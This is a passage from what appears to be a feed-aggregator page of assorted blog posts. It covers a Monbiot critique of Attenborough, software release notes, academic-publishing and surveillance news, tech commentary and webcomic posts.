Since 1985, when I started work in the department that has made most of his programmes, I’ve pressed the BBC to reveal environmental realities, often with dismal results. In 1995, I spent several months with a producer, developing a novel and imaginative proposal for an environmental series. The producer returned from his meeting with the channel controller in a state of shock. “He just looked at the title and asked ‘Is this environment?’. I said yes. He said, ‘I’ve spent two years trying to get environment off this fucking channel. Why the fuck are you bringing me environment?’”. I later discovered that this response was typical. The controllers weren’t indifferent. They were actively hostile. If you ask me whether the BBC or ExxonMobil has done more to frustrate environmental action in this country, I would say the BBC.

We all knew that only one person had the power to break this dam. For decades, David Attenborough, a former channel controller widely seen as the living embodiment of the BBC, has been able to make any programme he wants. So where, we kept asking, was he? At last, in 2000, he presented an environmental series: The State of the Planet.

It was an interesting and watchable series, but it left us with nowhere to go and nothing to do. Only in the last few seconds of the final episode was there a hint that structural forces might be at play: “real success can only come if there’s a change in our societies, in our economics and in our politics.” But what change? What economics? What politics? He had given us no clues.

To make matters worse, it was sandwiched between further programmes of his about the wonders of nature, that created a strong impression of robust planetary health. He might have been describing two different worlds. Six years later, he made another environmental series, The Truth about Climate Change. And this, in my view, was a total disaster.

It told us nothing about the driving forces behind climate breakdown. The only mention of fossil fuel companies was as part of the solution: “the people who extract fossil fuels like oil and gas have now come up with a way to put carbon dioxide back under ground.” Apart from the general “we”, the only distinct force identified as responsible was the “1.3 billion Chinese”. That a large proportion of Chinese emissions are caused by manufacturing the goods we buy was not mentioned. The series immediately triggered a new form of climate denial: I was bombarded with people telling me there was no point in taking action in Britain, because the Chinese were killing the planet.

If Attenborough’s environmentalism has a coherent theme, it is shifting the blame away from powerful forces and onto either society in general or the poor and weak. Sometimes it becomes pretty dark. In 2013, he told the Telegraph “What are all these famines in Ethiopia? What are they about? They’re about too many people for too little land … We say, get the United Nations to send them bags of flour. That’s barmy.”

There had not been a famine in Ethiopia for 28 years, and the last one was caused not by an absolute food shortage, but by civil war and government policies. His suggestion that food relief is counter-productive suggests he has read nothing on the subject since Thomas Malthus’s essay in 1798. But, cruel and ignorant as these comments were, they were more or less cost-free. By contrast, you do not remain a national treasure by upsetting powerful vested interests: look at the flak the wildlife and environmental presenter Chris Packham attracts.

I have always been entranced by David Attenborough’s wildlife programmes, but astonished by his consistent failure to mount a coherent, truthful and effective defence of the living world he loves. His revelation of the wonders of nature has been a great public service. But withholding the knowledge we need to defend it is, I believe, a grave disservice.

www.monbiot.com

06:35

Link [Scripting News]

I want to learn more about the history of journalism.

05:07

Very Narbonic Kickstarter Sketches [Skin Horse]

Shaenon: A few more sketches for the Narbonic Kickstarter campaign.  These are all Narbonic-related, so sorry for the lack of Skin Horse characters.

Channing: On the other hand, Narbonic characters are super awesome, so there seems to me to be little need to apologize.

04:56

The Jenndra Identitty Comics [Mimi and Eunice]

I published these immediately after writing this:

Several months ago I drew some Mimi & Eunice cartoons about modern transactivism. As you might guess, these will be very offensive to some people. I have and have long had trans friends, but modern transactivism is no more representative of them, than Zionism is of Jews, the BJP is of Hindus, or the KKK is of Christians. Unfortunately, most liberal “allies” don’t know the difference between actual diverse trans people, and the misogynist activists that claim to speak for them. Most liberals don’t tolerate any critique these days, let alone cartoon critique, which is graphic and funny; nothing pisses off ideologues like humor, the ultimate “disrespect”.

These cartoons are the first and ONLY things I’ve ever created that I’ve been too scared to share. I feel really bad about my own fear here. My Muse is my “higher power” and being too afraid to publish this work is a sin. But I am that scared.

Really I’m scared for my poor little film Seder-Masochism. I didn’t want to be killed on my North American festival tour. A transactivist tried to get me shut down from Ottawa, and another called for a boycott of Animation Is Film in Los Angeles, and who knows what else they’re doing that I’m not even aware of. I was no-platformed in my own town for saying people with penises are male. 

I occasionally see someone discover Seder-Masochism on Twitter, and they are immediately chastised by transactivists who tell them I’m a “bigot” who “hates trans people.” In the current climate, that effectively stops the sharing of my work. I’m a Free Culture advocate and my work depends on sharing; politically-motivated shutdowns of sharing render Free Culture (or any culture) ineffective.

Since all this is happening anyway, should I just publish those cartoons? I suppose it will be even worse for me and Seder-Masochism if I do, but this is no way to live. I’m censoring myself out of fear.

________

And in a subsequent discussion on fecebook, I wrote:

See, I don’t want to offend trans PEOPLE, who I like, but I don’t mind offending transACTIVISTS, the misogynist kind, who I hate. Many of whom are not trans.

Guess the chips are gonna fall where they may.

Anyway, here they are, all in one place and in order. The titles link to the individual entries.

Meet Jenndra Identitty

Lesbian


reference

Groveling

1.

2.

Inclusive

Suicide Threat

Check Your Privilege

Not Even Yours

Circular Definition

Meet Lefty Doodbro

Oppression Olympics

1984

Women In Tech

Trans vs. Cis

Silencing

Spelling

Appropriating

Hate Speech

Everyone’s a Misogynist

Humanity

Meanwhile…


Saturday, 10 November

21:56

Dirk Eddelbuettel: RcppArmadillo 0.9.200.4.0 [Planet Debian]


A new RcppArmadillo release, now at 0.9.200.4.0, based on the new Armadillo release 9.200.4 from earlier this week, is now on CRAN, and should get to Debian very soon.

Armadillo is a powerful and expressive C++ template library for linear algebra aiming towards a good balance between speed and ease of use with a syntax deliberately close to Matlab. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 532 (or 31 more since just the last release!) other packages on CRAN.

This release once again brings a number of improvements, see below for details.

Changes in RcppArmadillo version 0.9.200.4.0 (2018-11-09)

  • Upgraded to Armadillo release 9.200.4 (Carpe Noctem)

    • faster handling of symmetric positive definite matrices by rcond()

    • faster transpose of matrices with size ≥ 512x512

    • faster handling of compound sparse matrix expressions by accu(), diagmat(), trace()

    • faster handling of sparse matrices by join_rows()

    • expanded sign() to handle scalar arguments

    • expanded operators (*, %, +, −) to handle sparse matrices with differing element types (eg. multiplication of complex matrix by real matrix)

    • expanded conv_to() to allow conversion between sparse matrices with differing element types

    • expanded solve() to optionally allow keeping solutions of systems singular to working precision

    • workaround for gcc and clang bug in C++17 mode

  • Commented-out sparse matrix test consistently failing on the fedora-clang machine CRAN, and only there. No fix without access.

  • The 'Unit test' vignette is no longer included.

Courtesy of CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the R-Forge page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

21:07

Holger Levsen: 20181110-lts-201810 [Planet Debian]

My LTS work in October

In October 2018 sadly I just managed to spend 1h working on jessie LTS on:

Today while writing this I also noticed that https://lists.debian.org/debian-lts-announce/2018/10/threads.html currently misses DLAs 1532 until DLA 1541, which I have just reported to the #debian-lists IRC channel and as #913426. Update: as that bug was closed quickly, I guess instead we need to focus on #859123 and #859122, so that DLAs are accessible to everyone in future.

20:14

Some weekend stable kernel updates [LWN.net]

The 4.18.18, 4.14.80, 4.9.136, 4.4.163, and 3.18.125 stable kernel updates have all been released; each contains a relatively large set of important fixes.

The 3.18.x updates may be about to come to an end, since it is not clear that anybody is using them. "And from what I can see in the 'real world', no one is actually updating devices that rely on 3.18.y to the newer kernel releases. So I think I'm going to stop maintaining this tree soon unless someone speaks up and says 'I am using it!'"

17:42

Link [Scripting News]

Super important point: The 2018 election isn't over. At stake, governorships of Florida and Georgia. Senator from Florida. Stacey Abrams is leading the fight. She is so strong and determined. If she wins, we will win, hugely. Give her money now.

16:56

Link [Scripting News]

I started a thread for the Like functionality.

Link [Scripting News]

Had a great talk this morning with Chuck Shotton. We've been doing projects together on and off for decades. A few thoughts. I spend most of my programming time refactoring code for different purposes. I learned the benefits of modularity almost at the beginning. UCSD Pascal had the concept of units, which were more clean and simple and powerful at the same time than the equivalent in JavaScript today, almost forty years later. Also we had a Lambda-like code environment in Frontier in the mid-90s. Cleaner and quite a bit more efficient imho. I have been modularizing my Node code, but haven't come close to the level of factoring we did with Frontier. No conclusions, just interesting to observe how glitchy progress is.

Link [Scripting News]

Probably the most damaging form of voter suppression is the kind going on now. Getting hysterical about completing the count when you've got the result you want. We should all be funding Stacey Abrams, who made voting rights her big issue and is fighting for it, now.

16:07

Link [Scripting News]

Feeling adventurous? Click the Like icon to the right.

Link [Scripting News]

Note -- you may have to Hard Reload the page to be sure the files it needs to implement like are reloaded.

15:42

1146: Assistance Needed [Order of the Stick]

http://www.GiantITP.com/comics/oots1146.html

15:21

Good morning [Scripting News]

I'm working on a feature for Scripting News today, so you may see some extraneous posts here over the next few hours.

Please excuse the dust. Dig we must!

11:49

Researchers Report Elsevier to EU Anti-Competition Authority [TorrentFreak]

Academia certainly isn’t our prime focus here at TorrentFreak, but we have mentioned Elsevier repeatedly throughout the years.

With a net income of roughly $3 billion and operating profits exceeding $1 billion, Elsevier is one of the largest academic publishers in the world. One that protects its business with vigor.

The company has sued ‘pirate’ sites “Sci-Hub” and “LibGen” for the unauthorized distribution of millions of scientific papers, for example.

This resulted in a million dollar verdict in favor of the publisher, which was also able to seize several domain names. While Sci-Hub and LibGen are still around, Elsevier recently stepped up its game by obtaining an ISP blocking order against the sites in question.

So far, these efforts run parallel to what we see in the media piracy world. Torrent sites such as The Pirate Bay have been sued as well, and are now blocked in countries all over the world.

There is a significant difference though. The major movie studios who sue pirate sites have a good reputation in the industry, while Elsevier is heavily criticized by universities and researchers.

This criticism is far from new, but where the battle was previously fought in op-eds and on social media, it’s now on the agenda of the European Union as well. Pressure is mounting.

The first complaint comes from researchers Dr. Jonathan Tennant and Prof. Dr. Björn Brembs, who referred Elsevier’s parent company RELX Group to the EU Anti-Competition Authority late last month.

A serious allegation, but it turned out to be just the start.

This week, it was followed by a similar call from the European University Association (EUA), which represents over 800 higher education institutions in 47 countries throughout Europe.

In a letter (pdf) to the European Commission, the organization shares its concern about the lack of transparency and competition in Europe’s academic publishing sector, mentioning Elsevier and similar publishers.

One of the main frustrations is that researchers and universities provide the manpower and articles for these publishers, work that’s often funded with public money. This is then sold back to them by the publishers at high prices.

Or as EUA puts it:

“As a well-known allegory says: ‘Imagine a farmer who owns, feeds and milks his cow in order to give away the milk for free to a dairy company – and then finally buys it back in a milk carton at a very high price’. This is the business model of big research publishers.”

While publishers such as Elsevier use copyrights to protect and exploit their work, the nature of the “competition” issue is more complex.

Jonathan Tennant, who filed the first complaint with the EU Anti-Competition Authority, tells TorrentFreak that competition is hard to achieve when every academic article is unique and valuable. The articles are not substitutable; you either have access to one or you don’t.

The second problem is that Elsevier and others keep their pricing agreements secret, often through non-disclosure agreements, which is widely seen as an anti-competitive practice.

“Both of these things together, as well as issues to do with copyright, ‘marketplace’ concentration, obscenely high profits, and vendor lock-in all create an unsuitable ‘market’ around scholarly publishing, which has a negative impact across the entire research sector,” Tennant tells us.

Tennant and Brembs don’t provide any recommendations in their report. They’re leaving it up to the European Commission to decide what’s appropriate, but they believe that banning non-disclosure clauses and providing more transparency are two possible steps.

In an ideal world, one could argue that all academic research should be available for free. In the current system, many researchers don’t have access to some of the research in their field due to financial reasons, which hinders the progress of science.

This is also the main reason why Alexandra Elbakyan started the pirate research library Sci-Hub several years ago. Many researchers rely on it as a source, but Tennant says that he has some sort of love-hate relationship with the controversial pirate library.

“I think what Alexandra and Sci-Hub have done is phenomenal in emphasising the incredible dysfunction in research access from a greedy corporate publishing sector. It has demonstrated that access to knowledge is simple to provide.

“I think it also helps to level the playing field, from an industry whose business model is based on knowledge discrimination based on elite/financial status. For these things, and for being a symptom of a broken industry, I think it is wonderful,” he adds.

However, Tennant argues that it has also had some negative consequences. As founder of Open Science MOOC, he is a strong supporter of Open Access research, where papers are published without paywalls, and believes Sci-Hub may hinder the progress of this movement.

“Because Sci-Hub provides a simple, easy shortcut to free access (not Open Access), it removes some of the incentives for researchers to engage with Open Access in a more sustainable manner. For example, by self-archiving their work for free,” he notes.

That said, Tennant doesn’t think that terms such as ‘piracy’ and ‘theft’ necessarily apply to Sci-Hub. At least, not any more than it could apply to some of the major publishers themselves.

“Sometimes I think that it is the scholarly publishing industry themselves who are the thieves, blackmailing content/copyright from researchers and then preventing access to it as their business model.

“Depends which side of the ethical fence you fall on – private or public gain,” he adds.

Tennant hopes that the European Commission will pick up the ball to put an end to what he sees as an abuse of power and copyright. Where Sci-Hub tries to “tear down the paywalls” through force, ultimately he believes that it’s more sustainable to change the publishing system itself.

Tennant, who was at a blockchain for science conference this week, has some ideas of his own. Ideally, the future of academic publishing should be open, flexible, and relying on modern technologies.

“My ideal scenario would be a much more granular and lightweight system of continuous editing and review – something like GitHub combined with Stack Exchange combined with Wikipedia,” he says.

“Community-owned, low cost, open source, open everything, sustainable, inherently reproducible, less biased, non-profit, collaborative, instantaneous, fair, and equitable.

“Something like that would be inherently easy to create, should we start again from scratch today,” Tennant concludes.


11:14

Kickstarting a Da Vinci-inspired, programmable, mechanical drawing robot-arm [Cory Doctorow – Boing Boing]

Robert Sabuda (previously) writes, "It has long been a dream of the Leonardo da Vinci Robot Society to bring one of the Renaissance Master’s creations back to life. 2019 is the 500th anniversary of da Vinci’s death and the Society has chosen to honor his memory and celebrate his life through one of his best known inventions - the Robot Knight. This robot is an early proto-computer android whose read-only programmable memory allowed it to perform many actions. And it was also rumored that the robot’s arm could also perform an extremely complex task…draw a picture!"

"The Society has hired me to unlock the secrets of da Vinci’s robotic arm. The final result, in the form of a kit, is now available to you as da Vinci’s Drawmaton. Made only of wood and a few pieces of metal, this ancestor of the programmable computer, is capable of reading 1kb of analog memory via wooden “petalos” which, to da Vinci, resembled the petals of flowers. The programming “petalos” are easily switched out so the Drawmaton can draw an endless variety of single line images. A few turns of the hand knob completes a full rotation of the programming “petalos” and the drawing is complete. You can insert your own drawing tool into the robot’s hand, place any paper into the draw area, turn the knob and the drawing is revealed. Program your own images to create custom “petalos” which will draw your own masterpieces!"

Sabuda is an eminent mechanical engineer who created some of my favorite pop-up books. The Drawmaton comes with three different plotter-arms: a robot-hand, a skeletal hand, and a mailed fist. The engineering is incredibly clever, and the video demo is mesmerizing.

The project does not give any details of similar projects that the participants have pulled off in the past, which makes this on the riskier end for Kickstarters. Prices range from about $100-about $180, depending on which hand you want and whether you want two or eight "petalo" program discs.

Da Vinci's Drawmaton [The Leonardo da Vinci Robot Society/Kickstarter]

Winners Take All: Modern philanthropy means that giving some away is more important than how you got it [Cory Doctorow – Boing Boing]

Anand Giridharadas was a former McKinsey consultant turned "thought leader," invited to the stages of the best "ideas festivals" and to TED (twice), the author of some very good and successful books, and as a kind of capstone to this career, he was named a fellow to the Aspen Institute, an elite corps of entrepreneurs who are given institutional support and advice as they formulate "win-win" solutions to the world's greatest problems, harnessing the power of markets to lift people out of poverty and oppression.

But the deeper Giridharadas got into this new role, the more uncomfortable he became with it. On the night he was to give a valedictory address to an audience of business leaders, finance leaders, and other members of the ruling class, he abandoned the "Aspen consensus" and instead gave a scorching and excoriating talk about the structural failure of "win-win" as a way of thinking about the world's problems.

Giridharadas's point was that the business elites who were gathered to "give back" and "solve the big problems" were some of the most egregious contributors to those problems. They had looted the world's treasuries, shut down businesses and shipped jobs to low-wage, low-regulation free trade zones, gutted public services and replaced them with low-bidder private sector contractors, and had done so while formulating and promulgating the philosophy that business leaders' individual judgment about the provision of public services was always to be preferred to those policies set by democratically elected politicians.

The speech was -- obviously -- divisive. Giridharadas had expected to be pilloried for his views, and he was, to an extent. A hedge-fund millionaire sought him out later to call him an asshole, people glared at him from across the Institute's bar. But there were also people who applauded vigorously, billionaires who thanked him for finally articulating the doubt that had lurked in their hearts.

It was the start of a project that culminated in the publication of last summer's Winners Take All: The Elite Charade of Changing the World, a beautifully written "argument with Giridharadas's friends" about the problems with their worldview. As Giridharadas says, being inside the system gives you special insight when it comes to criticizing it, and Giridharadas is deep inside the system.

Winners Take All moves all the way up and down the stack of today's plutocratic philanthropy industry, talking to NGO managers, billionaire donors, critics, cheerleaders, superstars (Bill Clinton granted Giridharadas a wide-ranging interview about his extraordinary transition from a man who led the most powerful nation on Earth to someone committed to bypassing nations in favor of private philanthropy enacted by multinational corporations and hereditary billionaires), and, of course, critics.

The result is a comprehensive and devastating critique of elite giving, and a sharp articulation of its core philosophy: that it doesn't matter how you made your money, provided that you do some good with it once it's in your anonymous, offshore, tax-free bank-account. Giridharadas shows how this belief gives the rich cover to continue actions that are worsening the problems that they are nominally concerned with solving, and to still think of themselves (and be publicly recognized) as do-gooders rather than the source of our problems.

The private philanthropy model has both ideological and methodological blinkers. Practitioners of "marketworld" philanthropy approach every problem like a McKinsey consultant, bringing the management consultant's toolkit and specialized, jargony vocabulary with them. When "the protocol" of the management consultants is the only tool at your disposal, parts of problems that the protocol can't solve are downranked to oblivion, as are the methods that might tackle them.

I live on the periphery of the world Giridharadas describes: I, too, get invited to "ideas" festivals, and while I generally use my time there to decry corruption and to make explicit connections between bad policy and plutocratic wealth, I've also seen enough of the people Giridharadas is talking about to agree with him when he says that many of these people are kind, kind-hearted, and also secretly worried that the "market-world" approach to solving problems will never solve a problem that challenges market-world, or its beneficiaries (like them).

Giridharadas doesn't speculate about whether market-world's givers have their hearts in the right place because he wants to know whether they can be forgiven for their participation in the system -- but rather, whether they can be convinced to do something about it.

All through Giridharadas's book, he meets people high and low, rich and powerful or poor and scrappy, who understand that we're at a breaking point. Donald Trump campaigned on the idea that elite do-goodism was just cover for perpetuation of the system (never mind that he also planned on perpetuating the system), and he resonated with people. Ever since the late nineties, when Reagan-era deregulation had pervaded deeply into the system and wages started to stagnate, organized labor started to crumble, and policies like the WTO were consummated to the benefit of capital and the cost of the world, its climate and its people, there's been a mounting sense that we are on a collision course with disaster.

As inequality mounts, our weakened governments are unable to enact policies that upset plutocrats' apple carts. American health care, education, infrastructure, and (of course) its climate are unravelling so fast we can actually see it happen. People are turning to far-right movements and falling prey to charlatans as they seek a way out, or at least an explanation.

Giridharadas's book comes at a timely moment, when the problem is being named: winner-take-all capitalism, untethered by democratic controls, where how you make your money isn't as important as how you give some of it back. Giridharadas identifies a moment when we have to stop talking about "lack of opportunity" and start talking about oppression and inequality. To stop talking merely about solutions and start asking ourselves about causes.

Winners Take All: The Elite Charade of Changing the World [Anand Giridharadas/Knopf]

10:14

Get your memo read [Seth's Blog]

The unanticipated but important memo has a difficult road. It will likely be ignored.

The difficult parts:

a. no one is waiting to hear from you

b. you need to have the clarity to know who it’s for, what’s it for and precisely what you want them to do

c. you have to have the guts to leave out everything that isn’t part of (b)

Consider a memo that was left outside my door at a hotel recently. The management distributed 1000 of them and perhaps ten people read it and took action.

Here’s what to keep in mind:

  1. Pattern interrupt. When was the last time you listened to the seat belt announcement on an airplane? We ignore it because we’ve been trained to ignore it. When you show up in a place, at a time, with a format that we’ve been trained to ignore, we’ll ignore you.
  2. Write a story. You seek engagement. Talk about me. About you, about yesterday, today and tomorrow. If you earn the first sentence, you’ll need to sell me on reading the second sentence.
  3. Frame the story. Help me compare it to something. Create urgency. Make it about me, my status, my needs.
  4. Chunk the message. How many things are you trying to say? (Hint: two might be too many). Let me scan instead of study.
  5. Include a call to action. Right here, right now.

Here’s a before and after of what inspired me.

08:14

Researchers claim to have permanently neutralized ad-blocking's most promising weapons [Cory Doctorow – Boing Boing]

Last year, Princeton researchers revealed a powerful new ad-blocking technique: perceptual ad-blocking uses a machine-learning model trained on images of pages with the ads identified to make predictions about which page elements are ads to block and which parts are not.

However, a new paper from a group of Stanford and CISPA Helmholtz Center researchers reveals a powerful machine learning countermeasure that, they say, will permanently tilt the advantage toward advertisers and away from ad-blockers.

The team revealed a set of eight techniques to generate adversarial examples of slightly modified ads that completely flummoxed the perceptual ad-blocker's model: from overlaying a transparent image to modifying a few pixels in the logo used to demarcate an ad.

What's more, the team showed that they could cause the perceptual blocker's model to erroneously identify a page's actual content as an ad and block it, while leaving the ads unblocked.

The team says that these techniques will always outrace the ability of perceptual blocking models to detect them, suggesting that perceptual blocking may be a dead letter.

We note that detection of adversarial examples [27, 47]—a simpler problem in principle but also one far from solved [14]— may not be applicable to ad-blockers. Indeed, ad-blockers face both adversarial false-positives and false-negatives, so merely detecting a perturbation does not help in decision-making. This challenging threat model also applies in part to ad-blockers based on non-visual cues, e.g., ML-based ad-blockers that use similar features as filter lists [11, 29, 36]. None of these have yet been evaluated against adaptive adversaries.

Moreover, by virtue of not relying on visual cues, these models are presumably easier to attack in ways that are fully transparent to users (e.g., switching ad domains)

Ad-versarial: Defeating Perceptual Ad-Blocking [Florian Tramèr, Pascal Dupré, Gili Rusak, Giancarlo Pellegrino and Dan Boneh/Arxiv]

Researchers Defeat Most Powerful Ad Blockers, Declare a ‘New Arms Race’ [Daniel Oberhaus/Motherboard]

(via /.)

ICE and the DEA have secretly hidden cameras in some streetlights [Cory Doctorow – Boing Boing]

Government procurement data reveals that US Immigration and Customs Enforcement and the Drug Enforcement Agency have each spent tens of thousands of dollars on products from Houston's Cowboy Streetlight Concealments LLC, which specializes in fake streetlight housings designed to conceal surveillance cameras.

Since June, the DEA has spent $22,000 with Cowboy; ICE's total is about $28K. Neither the government agencies nor Cowboy Streetlight Concealments will reveal where or how the hidden camera housings were used.

The DEA is currently advertising for competitive bids for "concealments made to house network PTZ [Pan-Tilt-Zoom] camera, cellular modem, cellular compression device." In the absence of a competitive bid, it will award the contract to Oregon's Obsidian Integration LLC; Obsidian recently provided concealed cameras to the Jersey City PD.

The DEA also uses traffic barrels and digital speed displays to conceal its covert cameras.

Christie Crawford, who owns Cowboy Streetlight Concealments with her husband, a Houston police officer, said she was not at liberty to discuss the company’s federal contracts in detail.

“We do streetlight concealments and camera enclosures,” Crawford told Quartz. “Basically, there’s businesses out there that will build concealments for the government and that’s what we do. They specify what’s best for them, and we make it. And that’s about all I can probably say.”

However, she added: “I can tell you this—things are always being watched. It doesn’t matter if you’re driving down the street or visiting a friend, if government or law enforcement has a reason to set up surveillance, there’s great technology out there to do it.”

The DEA and ICE are hiding surveillance cameras in streetlights [Justin Rohrlich & Dave Gershgorn/Quartz]

(Image: Cowboy Concealments; twistedrhye, Cryteria, CC-BY)

Apple's war on repair continues: Amazon now bans refurb Apple products from third parties [Cory Doctorow – Boing Boing]

Apple has long understood that hardware products that last a long time result in falling unit sales, as customers opt to keep their old machines instead of buying the latest models; that's part of why the company led the charge that killed every single Right to Repair bill introduced last year -- less repairs leads to more "recycling," which is Applespeak for dropping used units into giant shredders without harvesting any usable parts first.

Every year, refurbishers rescue thousands of used Apple products from the e-waste streams, and every year, Apple finds new ways to frustrate their efforts.

The latest wrinkle: Apple has gotten Amazon to agree to ban the sale of refurbished Apple products except those that come from Apple directly.

Aaron Perzanowski, a law professor at Case Western Reserve University and coauthor of The End of Ownership, told me in an email that this decision is a dangerous infringement of ownership rights.

“Wow. This is a very troubling development,” he said. “Given Amazon’s dominance as an online retail marketplace, its decision to disregard the first sale rights of resellers will significantly limit consumer choice. The fact that this move was demanded by Apple makes it even more problematic. What we see here are the world’s two most valuable companies engaging in a coordinated assault on the lawful resale of consumer devices.”

The United States Supreme Court has ruled that people who legally own a product may legally resell it, and federal law protects that right under something known as the “first sale doctrine,” which says that copyright holders give up their copyright to individual copies of a work once it is sold: “the first sale doctrine, codified at 17 U.S.C. § 109, provides that an individual who knowingly purchases a copy of a copyrighted work from the copyright holder receives the right to sell, display, or otherwise dispose of that particular copy, notwithstanding the interests of the copyright owner,” the US Department of Justice explains.

“The first sale doctrine has never required an owner to get permission to sell their property,” Perzanowski added. “But Amazon is leveraging its power over its marketplace to give Apple power that the courts and Congress never have and never would.”

"It’s kind of mind boggling to think that a brand would be able to restrict sale of used products"

Amazon Is Kicking All Unauthorized Apple Refurbishers Off Amazon Marketplace [Jason Koebler/Motherboard]

(Image: John Bumstead)

Gorgeous, illustrated Japanese fireworks catalogs from the early 1900s [Cory Doctorow – Boing Boing]

The Yokohama Board of Education has posted scans of six fantastic catalogs from Hirayama Fireworks and Yokoi Fireworks, dating from the early 1900s. The illustrated catalogs are superb, with minimal words: just beautiful colored drawings depicting the burst-pattern from each rocket.

(via Kottke)

07:28

Canadian regulator wants your comments on ISP rules requiring simple contracts, easy switching [Cory Doctorow – Boing Boing]

The CRTC has proposed a code of conduct for Canadian ISPs that would "easy to understand, and make it easier for Canadians to switch providers to take advantage of competitive offers" -- but the new plan doesn't address the epidemic of fraudulent promises made by Canadian ISPs (that's part of a separate, ongoing government inquiry). Canadians hate their ISPs, with complaints rising by 36% in 2017. Canada has one of the world's most concentrated telcoms sectors, with the big cable and phone companies routinely gobbling up each other (and many media companies) with nary a peep from Canada's asleep-at-the-wheel competition regulators.

You can comment on the proposal here.

(Thanks, Alex!)

(Image: Coastal Elite, CC-BY-SA)

Video: Gangstagrass's first live video: authentic bluegrass/hip-hop mashup [Cory Doctorow – Boing Boing]

Rench writes, "Relix magazine just premiered this live video of Gangstagrass (previously), the pioneers of authentically mixed bluegrass and hip-hop. The energy crackles on this captivating stage performance. Can't decide which is hotter, the emcees' dynamic flow or the banjo and dobro players going into overdrive on the solos."

7-Eleven accused of weaponizing ICE raids to shed troublesome franchisees [Cory Doctorow – Boing Boing]

Most of America's 9,000 7-Eleven stores are owned by franchisees, many of them immigrants; the owners' contracts with 7-Eleven corporate allow the company to pull their franchises if they violate US law.

The current CEO of 7-Eleven is Joe DePinto, a West Point grad who got the job in 2005 and has spent his tenure slowly tightening the screw on franchisees, demanding business practices that return more profit to corporate HQ at the expense of the independent operators. As the franchisees have felt the sting, they've fought back, suing the company over DePinto's policies.

DePinto has become legendary for his dirty tricks campaign to get rid of his least-favored franchisees, from hiring private eyes to making secret recordings.

Now the franchisees allege that DePinto has started snitching on his own franchisees to ICE, directing government immigration raids against 7-Eleven stores. If these franchise owners are found to have illegally hired undocumented immigrants, DePinto can cancel their franchise agreements and kick them out of the business and take over their stores.

The evidence is circumstantial and 7-Eleven denies it, but ICE's raids on 7-Eleven stores have targeted owners who have made trouble for the company.

When Carter Anderson paused and asked if anyone had questions, Serge Haitayan took a microphone. He owns a 7-Eleven on a highway lined by grape farms in Fresno, Calif. Last year he joined Sandhu in the lawsuit alleging 7-Eleven was wrongly treating them like employees. On July 16 of this year, three federal agents walked into the little store he’s operated for 28 years, giving him three days to produce employee records dating back a year. He did that, and he hasn’t heard from ICE since.

“Why is immigration targeting 7-Eleven?” Haitayan asked Carter Anderson, drawing a rumbling of support. “Why?”

Carter Anderson paused, smiling nervously, as she scanned the crowd. “I understand getting this question,” she said. “But I cannot specifically answer this question.”

Haitayan continued. “All I hear is 7-Eleven being raided. It seems to be we are the only ones being targeted by ICE. Why?”

“I’m sorry,” she said.

The War Inside 7-Eleven [Lauren Etter/Bloomberg]

(via Super Punch)

(Image: OmiAsad, CC-BY)

01:42

Junichi Uekawa: Trying out crostini on chromebook plus (kevin). [Planet Debian]

Trying out crostini on chromebook plus (kevin). It's an aarch64 environment, some packages are missing because of that. Feels much slower compared to termux on the same machine especially when I am installing packages, but maybe because apt is completely different.

00:56

I returned to Windows 10 Mobile in 2018 [OSNews]

The mobile platform I chose was put to bed last year, with no new hardware or software features planned. As such, when Microsoft's Corporate Vice President of Windows 10, Joe Belfiore, confirmed that Windows 10 Mobile was no longer of "focus" to Microsoft, I threw in the towel. I've used both iOS and Android devices since then, and I can't say I've found my new home yet. Nothing I've used has been a full-time replacement for my Windows phones. So, after over a year of hunting for my next true mobile companion, I've temporarily given up the search to go back "home". I jokingly called this Windows 10 Mobile's last voyage, but in a funny way, it's true. Outside of security updates, Windows 10 Mobile is no longer being maintained, meaning there are some issues that are starting to arise.

Windows Phone 7/8 was the only modern smartphone operating system I've truly ever liked. The design, the applications, the fluidity - it felt like it was designed for me. I found it a joy to use, but it quickly became apparent that few developers were building applications for the platform, and the general public was never interested. This article is interesting, as it shows what using Windows 10 Mobile is like today.

I feel like I should snap up an HP Elite x3 for my collection of devices running dead platforms.

APEX furthers the Android modularization started by Treble [OSNews]

At a technical level, APEX has been compared to Magisk, which works by mounting folders into the system partition at boot, rather than modifying the system partition directly (which is detectable). APEX appears to extend that same functionality over into core Android packages, separating out things like the Android Runtime into their own packages, separate from the system partition. That means they can be individually and separately updated from the system image. It's possible that modularized OEM modifications could then be distributed on top of a Google-maintained system image - basically meaning the version of Android itself on a given phone could potentially be updated by Google, but the bits responsible for an OEM skin could be present, updated, and maintained as separate components. That's not to mention how it could ease ROM development, as Treble has.

It's good to see Google working to go beyond Treble, because the cold and harsh facts are that Treble hasn't made any serious dent in the update problem at all. The problem is as big as it's ever been.

00:07

What's new for WSL in the Windows 10 October 2018 Update [OSNews]

On October 2, 2018, Microsoft announced the availability of the Windows 10 October 2018 Update. This post will cover what you can expect to see in WSL for the October 2018 Update, Windows 10 version 1809, and from recent Windows Insiders builds. You can find additional information on our detailed release notes.

Mind you, as you can see in the previous news item, 1809 was pulled and hasn't been rereleased yet. I'm not entirely sure why this blog post detailing these changes is still up without acknowledging that.

Microsoft's silence on the Windows 10 1809 delay is deafening [OSNews]

Microsoft skipped over Release Preview with Windows 10 version 1809, and four days later, the update was pulled from Windows Update. This was mainly due to some users' files being deleted upon upgrading. Moreover, it turned out that the issue had been reported to the Feedback Hub, but it hadn't been upvoted enough times for anyone to notice. The company published a blog post a few days after that, explaining the issue and saying that you'll now be able to indicate severity of a bug in a Feedback Hub report. There was a slight apology, and a sign that Microsoft will do at least the bare minimum to make sure that this doesn't happen again. Microsoft hasn't said a word about it since.

Not a good few weeks for Windows Update and related services.

Friday, 09 November

23:21

look for the helpers [WIL WHEATON dot NET]

I feel like words are cheap and sentiment is empty, but I can’t stop thinking about the people who have lost homes due to the fires that are raging all […]

22:21

Friday Squid Blogging: Australian Fisherman Gets Inked [Schneier on Security]

Pretty good video.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

21:42

Bug Bounty Hunter Ran ISP Doxing Service [Krebs on Security]

A Connecticut man who’s earned bug bounty rewards and public recognition from top telecom companies for finding and reporting security holes in their Web sites secretly operated a service that leveraged these same flaws to sell their customers’ personal data, KrebsOnSecurity has learned.

